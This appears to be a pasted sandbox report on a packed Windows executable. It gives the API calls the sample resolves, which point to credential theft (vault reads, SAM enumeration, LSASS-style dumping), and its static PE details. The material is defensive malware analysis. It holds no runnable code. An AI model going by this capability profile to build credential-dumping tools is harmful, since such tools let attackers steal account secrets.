- "crypt32.dll.CertEnumCertificatesInStore",
- "crypt32.dll.CertAddEncodedCertificateToStore",
- "crypt32.dll.CertOpenStore",
- "crypt32.dll.CertFreeCertificateContext",
- "crypt32.dll.CertCloseStore",
- "crypt32.dll.CertSetCertificateContextProperty",
- "crypt32.dll.PFXExportCertStoreEx",
- "crypt32.dll.CryptUnprotectData",
- "crypt32.dll.CryptBinaryToStringW",
- "crypt32.dll.CryptStringToBinaryW",
- "crypt32.dll.CryptProtectData",
- "crypt32.dll.CryptExportPublicKeyInfo",
- "crypt32.dll.CryptAcquireCertificatePrivateKey",
- "crypt32.dll.CertNameToStrW",
- "crypt32.dll.CertGetCertificateContextProperty",
- "crypt32.dll.CertAddCertificateContextToStore",
- "crypt32.dll.CertFindCertificateInStore",
- "cryptdll.dll.CDLocateCSystem",
- "cryptdll.dll.MD5Final",
- "cryptdll.dll.MD5Init",
- "cryptdll.dll.CDLocateCheckSum",
- "cryptdll.dll.CDGenerateRandomBits",
- "cryptdll.dll.MD5Update",
- "fltlib.dll.FilterFindFirst",
- "fltlib.dll.FilterFindNext",
- "hid.dll.HidD_GetPreparsedData",
- "hid.dll.HidD_FreePreparsedData",
- "hid.dll.HidP_GetCaps",
- "hid.dll.HidD_GetFeature",
- "hid.dll.HidD_GetAttributes",
- "hid.dll.HidD_GetHidGuid",
- "hid.dll.HidD_SetFeature",
- "msasn1.dll.ASN1_CreateModule",
- "msasn1.dll.ASN1_CloseEncoder",
- "msasn1.dll.ASN1_CreateDecoder",
- "msasn1.dll.ASN1_FreeEncoded",
- "msasn1.dll.ASN1_CloseModule",
- "msasn1.dll.ASN1_CreateEncoder",
- "msasn1.dll.ASN1_CloseDecoder",
- "msasn1.dll.ASN1BERDotVal2Eoid",
- "msvcrt.dll.isdigit",
- "msvcrt.dll.isspace",
- "msvcrt.dll.__set_app_type",
- "msvcrt.dll.mbtowc",
- "msvcrt.dll.__mb_cur_max",
- "msvcrt.dll.isleadbyte",
- "msvcrt.dll.isxdigit",
- "msvcrt.dll.localeconv",
- "msvcrt.dll._snprintf",
- "msvcrt.dll._itoa",
- "msvcrt.dll.calloc",
- "msvcrt.dll.wctomb",
- "msvcrt.dll.ferror",
- "msvcrt.dll.iswctype",
- "msvcrt.dll.wcstombs",
- "msvcrt.dll.?terminate@@YAXXZ",
- "msvcrt.dll.__badioinfo",
- "msvcrt.dll.__pioinfo",
- "msvcrt.dll._read",
- "msvcrt.dll._lseeki64",
- "msvcrt.dll._write",
- "msvcrt.dll._isatty",
- "msvcrt.dll.ungetc",
- "msvcrt.dll._fmode",
- "msvcrt.dll.getchar",
- "msvcrt.dll._wpgmptr",
- "msvcrt.dll._commode",
- "msvcrt.dll.__setusermatherr",
- "msvcrt.dll._amsg_exit",
- "msvcrt.dll._initterm",
- "msvcrt.dll.exit",
- "msvcrt.dll._cexit",
- "msvcrt.dll._exit",
- "msvcrt.dll._XcptFilter",
- "msvcrt.dll.__wgetmainargs",
- "msvcrt.dll.__C_specific_handler",
- "msvcrt.dll.fgetws",
- "msvcrt.dll.memset",
- "msvcrt.dll.memcpy",
- "msvcrt.dll._errno",
- "msvcrt.dll.free",
- "msvcrt.dll._wcsdup",
- "msvcrt.dll.vfwprintf",
- "msvcrt.dll.fflush",
- "msvcrt.dll._wfopen",
- "msvcrt.dll.wprintf",
- "msvcrt.dll._fileno",
- "msvcrt.dll._iob",
- "msvcrt.dll.vwprintf",
- "msvcrt.dll._setmode",
- "msvcrt.dll.fclose",
- "msvcrt.dll.gmtime",
- "msvcrt.dll.malloc",
- "msvcrt.dll._msize",
- "msvcrt.dll.strftime",
- "msvcrt.dll.realloc",
- "netapi32.dll.NetServerGetInfo",
- "netapi32.dll.NetStatisticsGet",
- "netapi32.dll.NetShareEnum",
- "netapi32.dll.NetSessionEnum",
- "netapi32.dll.DsGetDcNameW",
- "netapi32.dll.NetApiBufferFree",
- "netapi32.dll.NetRemoteTOD",
- "netapi32.dll.NetWkstaUserEnum",
- "netapi32.dll.I_NetServerTrustPasswordsGet",
- "netapi32.dll.I_NetServerReqChallenge",
- "netapi32.dll.I_NetServerAuthenticate2",
- "ntdll.dll.wcsncmp",
- "ntdll.dll._wcstoui64",
- "ntdll.dll.wcstol",
- "ntdll.dll.wcstoul",
- "ntdll.dll.memmove",
- "ntdll.dll.wcsstr",
- "ntdll.dll._wcsnicmp",
- "ntdll.dll.strtoul",
- "ntdll.dll.wcschr",
- "ntdll.dll.wcsrchr",
- "ntdll.dll._stricmp",
- "ntdll.dll._vscwprintf",
- "ntdll.dll._wcsicmp",
- "ntdll.dll.strrchr",
- "ntdll.dll._vsnprintf",
- "ntdll.dll.memcmp",
- "ntdll.dll.RtlUnicodeStringToAnsiString",
- "ntdll.dll.RtlFreeAnsiString",
- "ntdll.dll.RtlDowncaseUnicodeString",
- "ntdll.dll.RtlFreeUnicodeString",
- "ntdll.dll.RtlInitUnicodeString",
- "ntdll.dll.RtlEqualUnicodeString",
- "ntdll.dll.NtQueryObject",
- "ntdll.dll.RtlCompressBuffer",
- "ntdll.dll.RtlGetCompressionWorkSpaceSize",
- "ntdll.dll.NtQuerySystemInformation",
- "ntdll.dll.RtlGetCurrentPeb",
- "ntdll.dll.NtQueryInformationProcess",
- "ntdll.dll.RtlCreateUserThread",
- "ntdll.dll.RtlGUIDFromString",
- "ntdll.dll.RtlStringFromGUID",
- "ntdll.dll.NtCompareTokens",
- "ntdll.dll.RtlGetNtVersionNumbers",
- "ntdll.dll.RtlEqualString",
- "ntdll.dll.RtlUpcaseUnicodeString",
- "ntdll.dll.RtlAppendUnicodeStringToString",
- "ntdll.dll.RtlAnsiStringToUnicodeString",
- "ntdll.dll.RtlFreeOemString",
- "ntdll.dll.RtlUpcaseUnicodeStringToOemString",
- "ntdll.dll.NtResumeProcess",
- "ntdll.dll.NtSuspendProcess",
- "ntdll.dll.NtTerminateProcess",
- "ntdll.dll.NtQuerySystemEnvironmentValueEx",
- "ntdll.dll.NtSetSystemEnvironmentValueEx",
- "ntdll.dll.NtEnumerateSystemEnvironmentValuesEx",
- "ntdll.dll.RtlIpv4AddressToStringW",
- "ntdll.dll.RtlIpv6AddressToStringW",
- "ntdll.dll.towupper",
- "ntdll.dll.__chkstk",
- "rpcrt4.dll.RpcMgmtEpEltInqNextW",
- "rpcrt4.dll.RpcMgmtEpEltInqBegin",
- "rpcrt4.dll.I_RpcGetCurrentCallHandle",
- "rpcrt4.dll.NdrClientCall2",
- "rpcrt4.dll.RpcMgmtEpEltInqDone",
- "rpcrt4.dll.RpcBindingFromStringBindingW",
- "rpcrt4.dll.RpcStringBindingComposeW",
- "rpcrt4.dll.MesEncodeIncrementalHandleCreate",
- "rpcrt4.dll.RpcBindingSetAuthInfoExW",
- "rpcrt4.dll.RpcBindingInqAuthClientW",
- "rpcrt4.dll.RpcBindingSetOption",
- "rpcrt4.dll.RpcImpersonateClient",
- "rpcrt4.dll.RpcStringFreeW",
- "rpcrt4.dll.RpcRevertToSelf",
- "rpcrt4.dll.MesDecodeIncrementalHandleCreate",
- "rpcrt4.dll.MesHandleFree",
- "rpcrt4.dll.MesIncrementalHandleReset",
- "rpcrt4.dll.NdrMesTypeDecode2",
- "rpcrt4.dll.NdrMesTypeAlignSize2",
- "rpcrt4.dll.NdrMesTypeFree2",
- "rpcrt4.dll.NdrMesTypeEncode2",
- "rpcrt4.dll.RpcServerUnregisterIfEx",
- "rpcrt4.dll.I_RpcBindingInqSecurityContext",
- "rpcrt4.dll.RpcServerInqBindings",
- "rpcrt4.dll.RpcServerListen",
- "rpcrt4.dll.RpcMgmtWaitServerListen",
- "rpcrt4.dll.RpcEpRegisterW",
- "rpcrt4.dll.RpcMgmtStopServerListening",
- "rpcrt4.dll.RpcBindingToStringBindingW",
- "rpcrt4.dll.RpcServerRegisterIf2",
- "rpcrt4.dll.RpcServerRegisterAuthInfoW",
- "rpcrt4.dll.RpcBindingVectorFree",
- "rpcrt4.dll.UuidToStringW",
- "rpcrt4.dll.RpcServerUseProtseqEpW",
- "rpcrt4.dll.RpcEpUnregister",
- "rpcrt4.dll.NdrServerCall2",
- "rpcrt4.dll.RpcEpResolveBinding",
- "rpcrt4.dll.UuidCreate",
- "samlib.dll.SamGetGroupsForUser",
- "samlib.dll.SamEnumerateGroupsInDomain",
- "samlib.dll.SamiChangePasswordUser",
- "samlib.dll.SamGetMembersInGroup",
- "samlib.dll.SamSetInformationUser",
- "samlib.dll.SamRidToSid",
- "samlib.dll.SamGetMembersInAlias",
- "samlib.dll.SamEnumerateAliasesInDomain",
- "samlib.dll.SamGetAliasMembership",
- "samlib.dll.SamOpenGroup",
- "samlib.dll.SamOpenAlias",
- "samlib.dll.SamQueryInformationUser",
- "samlib.dll.SamCloseHandle",
- "samlib.dll.SamEnumerateDomainsInSamServer",
- "samlib.dll.SamFreeMemory",
- "samlib.dll.SamEnumerateUsersInDomain",
- "samlib.dll.SamOpenUser",
- "samlib.dll.SamLookupDomainInSamServer",
- "samlib.dll.SamLookupNamesInDomain",
- "samlib.dll.SamLookupIdsInDomain",
- "samlib.dll.SamOpenDomain",
- "samlib.dll.SamConnect",
- "secur32.dll.FreeContextBuffer",
- "secur32.dll.LsaLookupAuthenticationPackage",
- "secur32.dll.LsaConnectUntrusted",
- "secur32.dll.LsaFreeReturnBuffer",
- "secur32.dll.LsaDeregisterLogonProcess",
- "secur32.dll.DeleteSecurityContext",
- "secur32.dll.LsaCallAuthenticationPackage",
- "secur32.dll.FreeCredentialsHandle",
- "secur32.dll.AcquireCredentialsHandleW",
- "secur32.dll.InitializeSecurityContextW",
- "secur32.dll.QueryContextAttributesW",
- "secur32.dll.EnumerateSecurityPackagesW",
- "setupapi.dll.SetupDiGetDeviceInterfaceDetailW",
- "setupapi.dll.SetupDiEnumDeviceInterfaces",
- "setupapi.dll.SetupDiGetClassDevsW",
- "setupapi.dll.SetupDiDestroyDeviceInfoList",
- "shell32.dll.CommandLineToArgvW",
- "shlwapi.dll.PathIsDirectoryW",
- "shlwapi.dll.PathCanonicalizeW",
- "shlwapi.dll.PathCombineW",
- "shlwapi.dll.PathFindFileNameW",
- "shlwapi.dll.PathIsRelativeW",
- "user32.dll.IsCharAlphaNumericW",
- "user32.dll.GetKeyboardLayout",
- "user32.dll.DispatchMessageW",
- "user32.dll.DefWindowProcW",
- "user32.dll.SetClipboardViewer",
- "user32.dll.SendMessageW",
- "user32.dll.GetClipboardSequenceNumber",
- "user32.dll.CreateWindowExW",
- "user32.dll.ChangeClipboardChain",
- "user32.dll.RegisterClassExW",
- "user32.dll.EnumClipboardFormats",
- "user32.dll.PostMessageW",
- "user32.dll.UnregisterClassW",
- "user32.dll.GetMessageW",
- "userenv.dll.CreateEnvironmentBlock",
- "userenv.dll.DestroyEnvironmentBlock",
- "version.dll.GetFileVersionInfoSizeW",
- "version.dll.VerQueryValueW",
- "version.dll.GetFileVersionInfoW",
- "winscard.dll.SCardFreeMemory",
- "winscard.dll.SCardListCardsW",
- "winscard.dll.SCardControl",
- "winscard.dll.SCardGetCardTypeProviderNameW",
- "winscard.dll.SCardReleaseContext",
- "winscard.dll.SCardListReadersW",
- "winscard.dll.SCardEstablishContext",
- "winscard.dll.SCardConnectW",
- "winscard.dll.SCardTransmit",
- "winscard.dll.SCardDisconnect",
- "winscard.dll.SCardGetAttrib",
- "winsta.dll.WinStationCloseServer",
- "winsta.dll.WinStationOpenServerW",
- "winsta.dll.WinStationFreeMemory",
- "winsta.dll.WinStationConnectW",
- "winsta.dll.WinStationQueryInformationW",
- "winsta.dll.WinStationEnumerateW",
- "wldap32.dll.#140",
- "wldap32.dll.#122",
- "wldap32.dll.#14",
- "wldap32.dll.#88",
- "wldap32.dll.#133",
- "wldap32.dll.#142",
- "wldap32.dll.#77",
- "wldap32.dll.#27",
- "wldap32.dll.#13",
- "wldap32.dll.#147",
- "wldap32.dll.#96",
- "wldap32.dll.#208",
- "wldap32.dll.#224",
- "wldap32.dll.#36",
- "wldap32.dll.#79",
- "wldap32.dll.#157",
- "wldap32.dll.#26",
- "wldap32.dll.#41",
- "wldap32.dll.#127",
- "wldap32.dll.#73",
- "wldap32.dll.#301",
- "wldap32.dll.#304",
- "wldap32.dll.#309",
- "wldap32.dll.#54",
- "wldap32.dll.#310",
- "wldap32.dll.#69",
- "wldap32.dll.#139",
- "wldap32.dll.#97",
- "wldap32.dll.#223",
- "wldap32.dll.#12",
- "wldap32.dll.#145",
- "wldap32.dll.#113",
- "wldap32.dll.#167",
- "wldap32.dll.#203",
- "rsaenh.dll.CPExportKey",
- "vaultcli.dll.VaultEnumerateItemTypes",
- "vaultcli.dll.VaultEnumerateVaults",
- "vaultcli.dll.VaultOpenVault",
- "vaultcli.dll.VaultGetInformation",
- "vaultcli.dll.VaultEnumerateItems",
- "vaultcli.dll.VaultCloseVault",
- "vaultcli.dll.VaultFree",
- "vaultcli.dll.VaultGetItem",
- "wintrust.dll.WinVerifyTrust",
- "bcrypt.dll.BCryptOpenAlgorithmProvider",
- "bcrypt.dll.BCryptSetProperty",
- "bcrypt.dll.BCryptGetProperty",
- "bcrypt.dll.BCryptGenerateSymmetricKey",
- "bcrypt.dll.BCryptDecrypt",
- "cryptsp.dll.CryptImportKey",
- "cryptsp.dll.CryptSetHashParam",
- "cryptsp.dll.CryptDestroyKey",
- "bcrypt.dll.BCryptCloseAlgorithmProvider",
- "bcrypt.dll.BCryptDestroyKey",
- "sspicli.dll.GetUserNameExW",
- "advapi32.dll.GetUserNameW",
- "sechost.dll.ConvertSidToStringSidW",
- "xmllite.dll.CreateXmlWriter",
- "xmllite.dll.CreateXmlWriterOutputWithEncodingName",
- "sechost.dll.ChangeServiceConfigW",
- "kernel32.dll.GetThreadContext",
- "kernel32.dll.OpenThread",
- "kernel32.dll.DebugActiveProcess",
- "kernel32.dll.DebugActiveProcessStop",
- "kernel32.dll.ContinueDebugEvent",
- "kernel32.dll.WaitForDebugEvent",
- "kernel32.dll.SystemTimeToTzSpecificLocalTime",
- "kernel32.dll.Process32FirstW",
- "kernel32.dll.Process32NextW",
- "kernel32.dll.DebugBreak",
- "kernel32.dll.SetFilePointerEx",
- "kernel32.dll.CreateSemaphoreW",
- "kernel32.dll.GetConsoleCP",
- "kernel32.dll.LoadLibraryExW",
- "kernel32.dll.GetStartupInfoW",
- "kernel32.dll.InitializeCriticalSectionAndSpinCount",
- "kernel32.dll.GetModuleFileNameW",
- "kernel32.dll.GetCommandLineW",
- "kernel32.dll.WriteConsoleW",
- "kernel32.dll.ReadConsoleW",
- "kernel32.dll.IsValidCodePage",
- "kernel32.dll.GetConsoleMode",
- "kernel32.dll.ReadConsoleInputA",
- "kernel32.dll.SetConsoleMode",
- "kernel32.dll.GetModuleHandleExW",
- "kernel32.dll.RtlPcToFileHeader",
- "kernel32.dll.RtlUnwindEx",
- "advapi32.dll.EnumServicesStatusExW",
- "advapi32.dll.AdjustTokenPrivileges",
- "advapi32.dll.RegDeleteValueW",
- "advapi32.dll.RegDeleteKeyW",
- "advapi32.dll.RegCreateKeyW",
- "comdlg32.dll.PrintDlgW",
- "gdi32.dll.StartDocW",
- "ole32.dll.CoAllowSetForegroundWindow",
- "pdh.dll.PdhOpenQueryW",
- "pdh.dll.PdhAddCounterW",
- "pdh.dll.PdhCollectQueryData",
- "pdh.dll.PdhGetFormattedCounterValue",
- "psapi.dll.EnumProcessModules",
- "psapi.dll.GetProcessImageFileNameW",
- "psapi.dll.GetModuleBaseNameW",
- "user32.dll.SetWindowTextW",
- "user32.dll.wsprintfW",
- "user32.dll.IsHungAppWindow",
- "user32.dll.EnumWindows",
- "user32.dll.DialogBoxIndirectParamW",
- "user32.dll.LoadCursorW",
- "kernel32.dll.InitializeCriticalSectionEx",
- "kernel32.dll.CreateEventExW",
- "kernel32.dll.CreateSemaphoreExW",
- "kernel32.dll.SetThreadStackGuarantee",
- "kernel32.dll.CreateThreadpoolTimer",
- "kernel32.dll.SetThreadpoolTimer",
- "kernel32.dll.WaitForThreadpoolTimerCallbacks",
- "kernel32.dll.CloseThreadpoolTimer",
- "kernel32.dll.CreateThreadpoolWait",
- "kernel32.dll.SetThreadpoolWait",
- "kernel32.dll.CloseThreadpoolWait",
- "kernel32.dll.FlushProcessWriteBuffers",
- "kernel32.dll.FreeLibraryWhenCallbackReturns",
- "kernel32.dll.GetCurrentProcessorNumber",
- "kernel32.dll.GetLogicalProcessorInformation",
- "kernel32.dll.CreateSymbolicLinkW",
- "kernel32.dll.EnumSystemLocalesEx",
- "kernel32.dll.CompareStringEx",
- "kernel32.dll.GetDateFormatEx",
- "kernel32.dll.GetLocaleInfoEx",
- "kernel32.dll.GetTimeFormatEx",
- "kernel32.dll.GetUserDefaultLocaleName",
- "kernel32.dll.IsValidLocaleName",
- "kernel32.dll.LCMapStringEx",
- "kernel32.dll.GetTickCount64",
- "dbghelp.dll.MiniDumpWriteDump",
- "dbghelp.dll.ImagehlpApiVersion",
- "dbghelp.dll.EnumerateLoadedModulesEx",
- "ntdll.dll.RtlCreateProcessReflection",
- "ntdll.dll.RtlGetLastNtStatus",
- "kernel32.dll.K32GetModuleFileNameExW",
- "kernel32.dll.Thread32First",
- "kernel32.dll.Thread32Next",
- "kernel32.dll.Module32First",
- "kernel32.dll.Module32Next",
- "kernel32.dll.Module32FirstW",
- "kernel32.dll.Module32NextW",
- "kernel32.dll.GetLongPathNameA",
- "kernel32.dll.GetLongPathNameW",
- "kernel32.dll.GetProcessTimes",
- "ntdll.dll.NtOpenThread",
- "ntdll.dll.NtQueryInformationThread",
- "ntdll.dll.NtQueryMutant",
- "ntdll.dll.NtSystemDebugControl",
- "ntdll.dll.RtlFreeHeap",
- "ntdll.dll.RtlGetFunctionTableListHead",
- "ntdll.dll.RtlGetUnloadEventTrace",
- "ntdll.dll.RtlGetUnloadEventTraceEx",
- "ntdll.dll.NtOpenProcessToken",
- "ntdll.dll.NtOpenThreadToken",
- "ntdll.dll.NtQueryInformationToken",
- "ntdll.dll.NtClose",
- "powrprof.dll.CallNtPowerInformation",
- "kernel32.dll.ExitThread",
- "kernel32.dll.SetFileAttributesW",
- "kernel32.dll.FreeConsole",
- "kernel32.dll.GetConsoleWindow",
- "kernel32.dll.SetThreadAffinityMask",
- "kernel32.dll.SetThreadPriority",
- "kernel32.dll.FlushInstructionCache",
- "kernel32.dll.PostQueuedCompletionStatus",
- "kernel32.dll.GetQueuedCompletionStatusEx",
- "kernel32.dll.CreateIoCompletionPort",
- "kernel32.dll.SetConsoleTextAttribute",
- "kernel32.dll.RegisterWaitForSingleObject",
- "kernel32.dll.UnregisterWait",
- "kernel32.dll.GetConsoleCursorInfo",
- "kernel32.dll.QueueUserWorkItem",
- "kernel32.dll.SetConsoleCursorInfo",
- "kernel32.dll.ReadConsoleInputW",
- "kernel32.dll.WriteConsoleInputW",
- "kernel32.dll.FillConsoleOutputAttribute",
- "kernel32.dll.GetNumberOfConsoleInputEvents",
- "kernel32.dll.GetShortPathNameW",
- "kernel32.dll.ReadDirectoryChangesW",
- "kernel32.dll.QueryPerformanceFrequency",
- "kernel32.dll.IsValidLocale",
- "kernel32.dll.CreateDirectoryW",
- "kernel32.dll.RemoveDirectoryW",
- "kernel32.dll.GetFinalPathNameByHandleW",
- "kernel32.dll.SetFileTime",
- "kernel32.dll.ReOpenFile",
- "kernel32.dll.CreateHardLinkW",
- "kernel32.dll.MoveFileExW",
- "kernel32.dll.CopyFileW",
- "kernel32.dll.SleepConditionVariableCS",
- "kernel32.dll.WakeConditionVariable",
- "kernel32.dll.InitializeConditionVariable",
- "kernel32.dll.CancelIo",
- "kernel32.dll.SetFileCompletionNotificationModes",
- "kernel32.dll.SetNamedPipeHandleState",
- "kernel32.dll.CreateNamedPipeW",
- "kernel32.dll.PeekNamedPipe",
- "kernel32.dll.CancelSynchronousIo",
- "kernel32.dll.GetNamedPipeHandleStateA",
- "kernel32.dll.CancelIoEx",
- "kernel32.dll.SwitchToThread",
- "kernel32.dll.ConnectNamedPipe",
- "kernel32.dll.UnregisterWaitEx",
- "kernel32.dll.GetExitCodeProcess",
- "kernel32.dll.EnumSystemLocalesW",
- "kernel32.dll.FindFirstFileExA",
- "kernel32.dll.GetLocaleInfoW",
- "kernel32.dll.ResetEvent",
- "kernel32.dll.InitializeSListHead",
- "kernel32.dll.GetThreadTimes",
- "kernel32.dll.FreeLibraryAndExitThread",
- "advapi32.dll.CryptGenRandom",
- "advapi32.dll.LsaAddAccountRights",
- "user32.dll.MapVirtualKeyW",
- "ws2_32.dll.#112",
- "ws2_32.dll.WSARecvFrom",
- "ws2_32.dll.#22",
- "ws2_32.dll.#7",
- "ws2_32.dll.#111",
- "kernel32.dll.InitOnceExecuteOnce",
- "kernel32.dll.GetFileInformationByHandleEx",
- "kernel32.dll.SetFileInformationByHandle",
- "kernel32.dll.WakeAllConditionVariable",
- "kernel32.dll.InitializeSRWLock",
- "kernel32.dll.AcquireSRWLockExclusive",
- "kernel32.dll.TryAcquireSRWLockExclusive",
- "kernel32.dll.ReleaseSRWLockExclusive",
- "kernel32.dll.SleepConditionVariableSRW",
- "kernel32.dll.CreateThreadpoolWork",
- "kernel32.dll.SubmitThreadpoolWork",
- "kernel32.dll.CloseThreadpoolWork",
- "ntdll.dll.RtlGetVersion",
- "ntdll.dll.RtlNtStatusToDosError",
- "ntdll.dll.NtDeviceIoControlFile",
- "ntdll.dll.NtQueryInformationFile",
- "ntdll.dll.NtSetInformationFile",
- "ntdll.dll.NtQueryVolumeInformationFile",
- "ntdll.dll.NtQueryDirectoryFile",
- "user32.dll.SetWinEventHook",
- "wersvc.dll.ServiceMain",
- "wersvc.dll.SvchostPushServiceGlobals"
- ]
- [*] Static Analysis: {
- "pe": {
- "peid_signatures": null,
- "imports": [
- {
- "imports": [
- {
- "name": "RegCloseKey",
- "address": "0xa9e154"
- }
- ],
- "dll": "ADVAPI32.dll"
- },
- {
- "imports": [
- {
- "name": null,
- "address": "0xa9e15c"
- }
- ],
- "dll": "COMCTL32.dll"
- },
- {
- "imports": [
- {
- "name": "ChooseColorA",
- "address": "0xa9e164"
- }
- ],
- "dll": "comdlg32.dll"
- },
- {
- "imports": [
- {
- "name": "Escape",
- "address": "0xa9e16c"
- }
- ],
- "dll": "GDI32.dll"
- },
- {
- "imports": [
- {
- "name": "GetAdaptersInfo",
- "address": "0xa9e174"
- }
- ],
- "dll": "iphlpapi.dll"
- },
- {
- "imports": [
- {
- "name": "LoadLibraryA",
- "address": "0xa9e17c"
- },
- {
- "name": "ExitProcess",
- "address": "0xa9e180"
- },
- {
- "name": "GetProcAddress",
- "address": "0xa9e184"
- },
- {
- "name": "VirtualProtect",
- "address": "0xa9e188"
- }
- ],
- "dll": "KERNEL32.DLL"
- },
- {
- "imports": [
- {
- "name": "OleRun",
- "address": "0xa9e190"
- }
- ],
- "dll": "ole32.dll"
- },
- {
- "imports": [
- {
- "name": "VariantCopy",
- "address": "0xa9e198"
- }
- ],
- "dll": "OLEAUT32.dll"
- },
- {
- "imports": [
- {
- "name": "RasHangUpA",
- "address": "0xa9e1a0"
- }
- ],
- "dll": "RASAPI32.dll"
- },
- {
- "imports": [
- {
- "name": "ShellExecuteA",
- "address": "0xa9e1a8"
- }
- ],
- "dll": "SHELL32.dll"
- },
- {
- "imports": [
- {
- "name": "GetDC",
- "address": "0xa9e1b0"
- }
- ],
- "dll": "USER32.dll"
- },
- {
- "imports": [
- {
- "name": "VerQueryValueA",
- "address": "0xa9e1b8"
- }
- ],
- "dll": "VERSION.dll"
- },
- {
- "imports": [
- {
- "name": "InternetOpenA",
- "address": "0xa9e1c0"
- }
- ],
- "dll": "WININET.dll"
- },
- {
- "imports": [
- {
- "name": "waveOutOpen",
- "address": "0xa9e1c8"
- }
- ],
- "dll": "WINMM.dll"
- },
- {
- "imports": [
- {
- "name": "OpenPrinterA",
- "address": "0xa9e1d0"
- }
- ],
- "dll": "WINSPOOL.DRV"
- },
- {
- "imports": [
- {
- "name": "recvfrom",
- "address": "0xa9e1d8"
- }
- ],
- "dll": "WS2_32.dll"
- }
- ],
- "digital_signers": null,
- "exported_dll_name": null,
- "actual_checksum": "0x00539452",
- "overlay": null,
- "imagebase": "0x00400000",
- "reported_checksum": "0x00000000",
- "icon_hash": null,
- "entrypoint": "0x00a9d5b0",
- "timestamp": "2019-06-24 19:13:25",
- "osversion": "4.0",
- "sections": [
- {
- "name": "UPX0",
- "characteristics": "IMAGE_SCN_CNT_UNINITIALIZED_DATA|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
- "virtual_address": "0x00001000",
- "size_of_data": "0x00000000",
- "entropy": "0.00",
- "raw_address": "0x00000400",
- "virtual_size": "0x00170000",
- "characteristics_raw": "0xe0000080"
- },
- {
- "name": "UPX1",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
- "virtual_address": "0x00171000",
- "size_of_data": "0x0052c800",
- "entropy": "7.82",
- "raw_address": "0x00000400",
- "virtual_size": "0x0052d000",
- "characteristics_raw": "0xe0000040"
- },
- {
- "name": "UPX2",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
- "virtual_address": "0x0069e000",
- "size_of_data": "0x00000400",
- "entropy": "3.70",
- "raw_address": "0x0052cc00",
- "virtual_size": "0x00001000",
- "characteristics_raw": "0xc0000040"
- }
- ],
- "resources": [],
- "dirents": [
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_EXPORT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x0069e000",
- "name": "IMAGE_DIRECTORY_ENTRY_IMPORT",
- "size": "0x0000037c"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_RESOURCE",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_EXCEPTION",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_SECURITY",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_BASERELOC",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_DEBUG",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_COPYRIGHT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_GLOBALPTR",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_TLS",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_IAT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_RESERVED",
- "size": "0x00000000"
- }
- ],
- "exports": [],
- "guest_signers": {},
- "imphash": "7e8fd41cc4af90fd0b2731fbcc919e1a",
- "icon_fuzzy": null,
- "icon": null,
- "pdbpath": null,
- "imported_dll_count": 16,
- "versioninfo": []
- }
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement